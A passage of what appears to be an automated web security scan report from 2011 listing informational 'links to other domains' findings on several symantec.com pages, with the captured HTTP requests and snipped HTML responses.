<li>
<a href="http://www.pctools.com/simple-backup/" title="Simple Backup">Simple Backup</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/file-recover/" title="File Recovery">File Recovery</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor">Spyware Doctor</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian">Privacy Guardian</a>
...[SNIP]...
<li>
<a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus">Free Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/password-manager/" title="Password Manager">Password Manager</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic">Registry Mechanic</a>
...[SNIP]...

14.58. http://www.symantec.com/business/theme.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/business/theme.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.symantec.com/business/theme.jsp?themeid=contact-verisign

The response contains the following links to other domains:

http://free.pctools.com/free-antivirus/
http://twitter.com/VeriSignAuth
http://us.norton.com/
http://us.norton.com/antivirus/
http://us.norton.com/ghost/
http://us.norton.com/internet-security/
http://us.norton.com/nortonlive/free-pc-checkup.jsp
http://us.norton.com/nortonlive/spyware-virus-removal.jsp
http://us.norton.com/security_response/malware.jsp
http://us.norton.com/security_response/phishing.jsp
http://us.norton.com/security_response/spyware.jsp
http://www.backup.com/
http://www.facebook.com/VeriSignAuthentication
http://www.pctools.com/file-recover/
http://www.pctools.com/password-manager/
http://www.pctools.com/performance-toolkit/
http://www.pctools.com/privacy-guardian/
http://www.pctools.com/registry-mechanic/
http://www.pctools.com/simple-backup/
http://www.pctools.com/spyware-doctor-antivirus/
http://www.pctools.com/spyware-doctor/
http://www.thawte.com/
http://www.verisign.ch/
http://www.verisign.co.jp/
http://www.verisign.co.uk/
http://www.verisign.com.au/
http://www.verisign.com.br/
http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html
http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html
http://www.verisign.com/authentication/two-factor-authentication/index.html
http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html
http://www.verisign.com/code-signing/index.html
http://www.verisign.com/code-signing/index.html?tid=sym_a_box
http://www.verisign.com/get-verisign-seal/index.html?tid=sym_a_box
http://www.verisign.com/ssl/buy-ssl-certificates/index.html?tid=sym_a_box
http://www.verisign.com/ssl/current-ssl-customers/renew-ssl/index.html?tid=sym_a_box
http://www.verisign.com/ssl/free-trial/index.html
http://www.verisign.com/ssl/index.html
http://www.verisign.com/ssl/seal/index.html
http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html
http://www.verisign.com/ssl/ssl-information-center/index.html
http://www.verisign.com/support/code-signing-support/code-signing-misuse/index.html
http://www.verisign.com/support/contact/index.html
http://www.verisign.com/support/ssl-certificates-support/extended-validation-certificate-complaint/index.html
http://www.verisign.com/support/ssl-certificates-support/secure-site-seal/abuse.html
http://www.verisign.com/trust-seal/index.html
http://www.verisign.com/trust-seal/resources/malware-faq/index.html
http://www.verisign.in/
http://www.verisignchina.com.cn/
http://www.youtube.com/verisignauth
https://forms.verisign.com/websurveys/servlet/ActionMultiplexer?Action_ID=ACT2000&WSD_mode=3&WSD_surveyInfoID=943&toc=AAAAA-943-01-26&brand=01&country=26&oldToc=w29810323919638016&cid=47D9F8084F78B063
https://idprotect.verisign.com/wheretouse.v
https://trust-center.verisign.com/process/retail/console_login?application_locale=VRSN_US&tid=sym_a_box
https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VTC_US&tid=sym_a_box
https://www.verisign.com/cgi-bin/go.cgi?a=w13490307590800002
https://www.verisign.com/cgi-bin/go.cgi?a=w45290160530800000
https://www.verisign.com/cgi-bin/go.cgi?a=w62590256709788020

Request

GET /business/theme.jsp?themeid=contact-verisign HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/verisign-worldwide/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1315621569527-New%7C1336357569527%3B%20event69%3Devent69%7C1336357569528%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D806960442771%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621570007; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 51820
Cache-Control: public, max-age=1145
Date: Fri, 09 Sep 2011 21:26:48 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>VeriSign Authentication Services, now a part of Symantec - SSL Certificates, Extended Validation SSL, User Authenti
...[SNIP]...
<br />
                       <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w45290160530800000" target="_blank">Submit inquiry online</a>
...[SNIP]...
<br />
                       <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w62590256709788020" target="_blank">Submit inquiry online</a>
...[SNIP]...
<br />
                       <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w62590256709788020" target="_blank">Submit inquiry online</a>
...[SNIP]...
<br />
                       <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w13490307590800002" target="_blank">Submit inquiry online</a>
...[SNIP]...
<br />
                       <a href="https://forms.verisign.com/websurveys/servlet/ActionMultiplexer?Action_ID=ACT2000&WSD_mode=3&WSD_surveyInfoID=943&toc=AAAAA-943-01-26&brand=01&country=26&oldToc=w29810323919638016&cid=47D9F8084F78B063" target="_blank">Submit an inquiry online</a>
...[SNIP]...
</strong> If you purchased your VIP Credential from a VIP Member Site, contact the VIP Member Site for assistance. For a list of all member sites, <a href="https://idprotect.verisign.com/wheretouse.v" target="_blank">click here</a>
...[SNIP]...
<strong><a href="http://www.verisign.ch/" target="_blank">Europe Headquarters</a>
...[SNIP]...
<strong><a href="http://www.verisign.in/" target="_blank">India</a>
...[SNIP]...
<strong><a href="http://www.verisign.com.au/" target="_blank">Australia Headquarters</a>
...[SNIP]...
<strong><a href="http://www.verisign.co.jp/" target="_blank">Japan Headquarters </a>
...[SNIP]...
<strong><a href="http://www.verisign.ch/" target="_blank">Switzerland</a>
...[SNIP]...
<strong><a href="http://www.thawte.com/">Africa</a>
...[SNIP]...
<strong><a href="http://www.verisign.co.uk/">United Kingdom</a>
...[SNIP]...
<strong><a href="http://www.verisign.com.br/" target="_blank">Brazil</a>
...[SNIP]...
<strong><a href="http://www.verisignchina.com.cn/" target="_blank">China</a>
...[SNIP]...
</h4>
                   <a href="http://www.verisign.com/support/contact/index.html" target="_blank">VeriSign Support Contacts</a>
...[SNIP]...
<br />
                   <a href="http://www.verisign.com/support/code-signing-support/code-signing-misuse/index.html" target="_blank">Report Code Signing Misuse</a><br />
                   <a href="http://www.verisign.com/support/ssl-certificates-support/secure-site-seal/abuse.html" target="_blank">Report VeriSign Seal Abuse</a><br />
                   <a href="http://www.verisign.com/support/ssl-certificates-support/extended-validation-certificate-complaint/index.html" target="_blank">Report EV Certificate Complaint</a>
...[SNIP]...
f you have questions regarding the VeriSign Secured.. Seal or VeriSign Trust Seal, including how to obtain one for use on your site or how it is being used on a site you have visited, please visit our <a href="http://www.verisign.com/ssl/seal/index.html" target="_blank">seal information page</a>
...[SNIP]...
<div style="float:left; width:50px; margin-right:8px">
                               <a href="http://www.verisign.com/ssl/buy-ssl-certificates/index.html?tid=sym_a_box" target="_blank"><img src="/content/en/us/enterprise/images/theme/b-thm-verisign-buy-btn.gif" width="50" height="15" alt="Buy SSL Certificates" />
...[SNIP]...
<div>

                               <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/ssl/buy-ssl-certificates/index.html?tid=sym_a_box" title="Buy SSL Certificates" target="_blank">SSL Certificates</a>
...[SNIP]...
<div style="float:left; width:50px; margin-right:8px">
                               <a href="https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VTC_US&tid=sym_a_box" target="_blank"><img src="/content/en/us/enterprise/images/theme/b-thm-verisign-buy-btn.gif" width="50" height="15" alt="Buy VeriSign Trust Seal" />
...[SNIP]...
<div>
                               <a style="font-family:arial; font-size:11px" href="https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VTC_US&tid=sym_a_box" title="Buy VeriSign Trust Seal" target="_blank">VeriSign Trust Seal</a>
...[SNIP]...
<div style="float:left; width:50px; margin-right:8px">
                               <a href="http://www.verisign.com/code-signing/index.html?tid=sym_a_box" target="_blank"><img src="/content/en/us/enterprise/images/theme/b-thm-verisign-buy-btn.gif" width="50" height="15" alt="Buy Code Signing Certificates" />
...[SNIP]...
<div>
                               <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/code-signing/index.html?tid=sym_a_box" title="Buy Code Signing" target="_blank">Code Signing</a>
...[SNIP]...
<div style="float:left; width:50px; margin-right:8px">

                               <a href="http://www.verisign.com/ssl/free-trial/index.html" target="_blank"><img src="/content/en/us/enterprise/images/theme/b-thm-verisign-try-btn.gif" width="50" height="15" alt="Free VeriSign Trials" />
...[SNIP]...
<div>
                               <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/ssl/free-trial/index.html" title="Free Trials" target="_blank">Free Trials</a>
...[SNIP]...
<div style="float:left; width:50px; margin-right:8px">
                               <a href="http://www.verisign.com/ssl/current-ssl-customers/renew-ssl/index.html?tid=sym_a_box" target="_blank"><img src="/content/en/us/enterprise/images/theme/b-thm-verisign-renew-btn.gif" width="50" height="15" alt="Renew SSL Certificates" />
...[SNIP]...
<div>
                               <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/ssl/current-ssl-customers/renew-ssl/index.html?tid=sym_a_box" title="Renew SSL Certificates" target="_blank">SSL Certificates</a>
...[SNIP]...
<div style="float:left; width:50px; margin-right:8px">
                               <a href="https://trust-center.verisign.com/process/retail/console_login?application_locale=VRSN_US&tid=sym_a_box" target="_blank"><img src="/content/en/us/enterprise/images/theme/b-thm-verisign-signin-btn.gif" width="50" height="15" alt="Sign In to My Account" />
...[SNIP]...
<div>
                               <a style="font-family:arial; font-size:11px" href="https://trust-center.verisign.com/process/retail/console_login?application_locale=VRSN_US&tid=sym_a_box" title="Sign In to My Account" target="_blank">My Account</a>
...[SNIP]...
<div style="float:left; width:90px; margin-right:5px">
                               <a href="http://www.verisign.com/get-verisign-seal/index.html?tid=sym_a_box" target="_blank"><img src="/content/en/us/enterprise/images/theme/b-thm-verisign-logo.gif" width="90" height="49" alt="Get a VeriSign Seal" />
...[SNIP]...
<div style="padding-top:5px">
                               <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/get-verisign-seal/index.html?tid=sym_a_box" title="Get a VeriSign Seal" target="_blank">Get a VeriSign Seal</a>
...[SNIP]...
<div style="padding-bottom: 5px;"><a href="http://twitter.com/VeriSignAuth" target="_blank">
               <div style="float: left;">
...[SNIP]...
<div style="padding-bottom: 5px;"><a href="http://www.facebook.com/VeriSignAuthentication" target="_blank">
               <div style="float: left;">
...[SNIP]...
<div style="padding-bottom: 5px;"><a href="http://www.youtube.com/verisignauth" target="_blank">
               <div style="float: left;">
...[SNIP]...
<li>
<a href="http://us.norton.com/antivirus/" title="AntiVirus">AntiVirus</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/ghost/" title="Backup Software">Backup Software</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/internet-security/" title="Internet Security">Internet Security</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/malware.jsp" title="Malware">Malware</a>
...[SNIP]...
<li>
<a href="http://www.backup.com/" title="Online Backup">Online Backup</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing">Phishing</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware">Spyware</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/" title="Virus Protection">Virus Protection</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal">Virus Removal</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan">Virus Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL">SSL</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates">SSL Certificates</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation">Extended Validation</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal">VeriSign Trust Seal</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication">Two-Factor Authentication</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection">Identity Protection</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan">Malware Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/code-signing/index.html" title="Code Signing">Code Signing</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure">Public Key Infrastructure</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI">PKI</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus">Spyware Doctor with Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit">Performance Toolkit</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/simple-backup/" title="Simple Backup">Simple Backup</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/file-recover/" title="File Recovery">File Recovery</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor">Spyware Doctor</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian">Privacy Guardian</a>
...[SNIP]...
<li>
<a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus">Free Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/password-manager/" title="Password Manager">Password Manager</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic">Registry Mechanic</a>
...[SNIP]...

14.59. http://www.symantec.com/business/verisign/fraud-detection-service previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/business/verisign/fraud-detection-service

Issue detail

The page was loaded from a URL containing a query string:

http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps

The response contains the following links to other domains:

http://buy.norton.com/?trf_id=symcom&inid=us_ghp_topnav_link1_to_store
http://buy.norton.com/?trf_id=symcom&inid=us_hho_errorpage_to_store
http://buy.norton.com/?trf_id=symcom&inid=us_hho_homepage_topnav1_to_store
http://buy.norton.com/upgrades-renewals?ctry=US&lang=EN&trf_id=symcom&inid=us_hho_errorpage_to_store
http://free.pctools.com/free-antivirus/
http://us.norton.com/
http://us.norton.com/antivirus/
http://us.norton.com/ghost/
http://us.norton.com/internet-security/
http://us.norton.com/nortonlive/free-pc-checkup.jsp
http://us.norton.com/nortonlive/spyware-virus-removal.jsp
http://us.norton.com/security_response/malware.jsp
http://us.norton.com/security_response/phishing.jsp
http://us.norton.com/security_response/spyware.jsp
http://www.backup.com/
http://www.pctools.com/file-recover/
http://www.pctools.com/password-manager/
http://www.pctools.com/performance-toolkit/
http://www.pctools.com/privacy-guardian/
http://www.pctools.com/registry-mechanic/
http://www.pctools.com/simple-backup/
http://www.pctools.com/spyware-doctor-antivirus/
http://www.pctools.com/spyware-doctor/
http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html
http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html
http://www.verisign.com/authentication/two-factor-authentication/index.html
http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html
http://www.verisign.com/code-signing/index.html
http://www.verisign.com/ssl/index.html
http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html
http://www.verisign.com/ssl/ssl-information-center/index.html
http://www.verisign.com/trust-seal/index.html
http://www.verisign.com/trust-seal/resources/malware-faq/index.html

Request

GET /business/verisign/fraud-detection-service?tid=gnps HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621646660-New%7C1336357646660%3B%20event69%3Devent69%7C1336357646662%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/4

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 22137
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:30:49 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Error: Page Not Found - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-
...[SNIP]...
<div id="globalNavMainInner5">
<a href='http://buy.norton.com?trf_id=symcom&inid=us_ghp_topnav_link1_to_store'>Store</a>
...[SNIP]...
<li><a href="http://buy.norton.com?trf_id=symcom&inid=us_hho_homepage_topnav1_to_store">Store</a>
...[SNIP]...
<h3><a href="http://buy.norton.com?trf_id=symcom&inid=us_ghp_topnav_link1_to_store">Store</a>
...[SNIP]...
<b><a href="http://buy.norton.com/?trf_id=symcom&inid=us_hho_errorpage_to_store">Norton</a>
...[SNIP]...
<li><a href="http://buy.norton.com/?trf_id=symcom&inid=us_hho_errorpage_to_store">Welcome</a>
...[SNIP]...
<li><a href="http://buy.norton.com/?trf_id=symcom&inid=us_hho_errorpage_to_store">Shop Products</a>
...[SNIP]...
<li><a href="http://buy.norton.com/upgrades-renewals?ctry=US&lang=EN&trf_id=symcom&inid=us_hho_errorpage_to_store">Renew</a>
...[SNIP]...
<li><a href="http://buy.norton.com/?trf_id=symcom&inid=us_hho_errorpage_to_store">Shopping Resources</a>
...[SNIP]...
<li><a href="http://buy.norton.com/?trf_id=symcom&inid=us_hho_errorpage_to_store">Store Services</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/antivirus/" title="AntiVirus">AntiVirus</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/ghost/" title="Backup Software">Backup Software</a>
...[SNIP]...
<li>

<a href="http://us.norton.com/internet-security/" title="Internet Security">Internet Security</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/malware.jsp" title="Malware">Malware</a>
...[SNIP]...
<li>
<a href="http://www.backup.com/" title="Online Backup">Online Backup</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing">Phishing</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware">Spyware</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/" title="Virus Protection">Virus Protection</a>
...[SNIP]...
<li>

<a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal">Virus Removal</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan">Virus Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL">SSL</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates">SSL Certificates</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation">Extended Validation</a>
...[SNIP]...
<li>

<a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal">VeriSign Trust Seal</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication">Two-Factor Authentication</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection">Identity Protection</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan">Malware Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/code-signing/index.html" title="Code Signing">Code Signing</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure">Public Key Infrastructure</a>
...[SNIP]...
<li>

<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI">PKI</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus">Spyware Doctor with Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit">Performance Toolkit</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/simple-backup/" title="Simple Backup">Simple Backup</a>
...[SNIP]...
<li>

<a href="http://www.pctools.com/file-recover/" title="File Recovery">File Recovery</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor">Spyware Doctor</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian">Privacy Guardian</a>
...[SNIP]...
<li>
<a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus">Free Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/password-manager/" title="Password Manager">Password Manager</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic">Registry Mechanic</a>
...[SNIP]...

14.60. http://www.symantec.com/partners/sales-and-marketing/sales-marketing.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/partners/sales-and-marketing/sales-marketing.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.symantec.com/partners/sales-and-marketing/sales-marketing.jsp?id=marketing

The response contains the following links to other domains:

http://buy.norton.com/?trf_id=symcom&inid=us_ghp_topnav_link1_to_store
http://free.pctools.com/free-antivirus/
http://us.norton.com/
http://us.norton.com/antivirus/
http://us.norton.com/ghost/
http://us.norton.com/internet-security/
http://us.norton.com/nortonlive/free-pc-checkup.jsp
http://us.norton.com/nortonlive/spyware-virus-removal.jsp
http://us.norton.com/security_response/malware.jsp
http://us.norton.com/security_response/phishing.jsp
http://us.norton.com/security_response/spyware.jsp
http://www.backup.com/
http://www.pctools.com/file-recover/
http://www.pctools.com/password-manager/
http://www.pctools.com/performance-toolkit/
http://www.pctools.com/privacy-guardian/
http://www.pctools.com/registry-mechanic/
http://www.pctools.com/simple-backup/
http://www.pctools.com/spyware-doctor-antivirus/
http://www.pctools.com/spyware-doctor/
http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html
http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html
http://www.verisign.com/authentication/two-factor-authentication/index.html
http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html
http://www.verisign.com/code-signing/index.html
http://www.verisign.com/ssl/index.html
http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html
http://www.verisign.com/ssl/ssl-information-center/index.html
http://www.verisign.com/trust-seal/index.html
http://www.verisign.com/trust-seal/resources/malware-faq/index.html

Request

GET /partners/sales-and-marketing/sales-marketing.jsp?id=marketing HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://partnerlocator.symantec.com/public/search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; bizProdScrollVertical=0; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymanteccom%252Cveritasnonconsumer%252Csymantecpartner%253D%252526pid%25253Den/us%2525253A%25252520plocator%2525253A%25252520public%2525253A%25252520select%25252520country%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.symantec.com/partners/sales-and-marketing/sales-marketing.jsp%2525253Fid%2525253Dmarketing%252526ot%25253DA%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 41218
Cache-Control: public, max-age=3577
Date: Fri, 09 Sep 2011 21:39:01 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Marketing - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-
...[SNIP]...
<div id="globalNavMainInner5">
<a href='http://buy.norton.com?trf_id=symcom&inid=us_ghp_topnav_link1_to_store'>Store</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/antivirus/" title="AntiVirus">AntiVirus</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/ghost/" title="Backup Software">Backup Software</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/internet-security/" title="Internet Security">Internet Security</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/malware.jsp" title="Malware">Malware</a>
...[SNIP]...
<li>
<a href="http://www.backup.com/" title="Online Backup">Online Backup</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing">Phishing</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware">Spyware</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/" title="Virus Protection">Virus Protection</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal">Virus Removal</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan">Virus Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL">SSL</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates">SSL Certificates</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation">Extended Validation</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal">VeriSign Trust Seal</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication">Two-Factor Authentication</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection">Identity Protection</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan">Malware Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/code-signing/index.html" title="Code Signing">Code Signing</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure">Public Key Infrastructure</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI">PKI</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus">Spyware Doctor with Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit">Performance Toolkit</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/simple-backup/" title="Simple Backup">Simple Backup</a>
...[SNIP]...
<li>
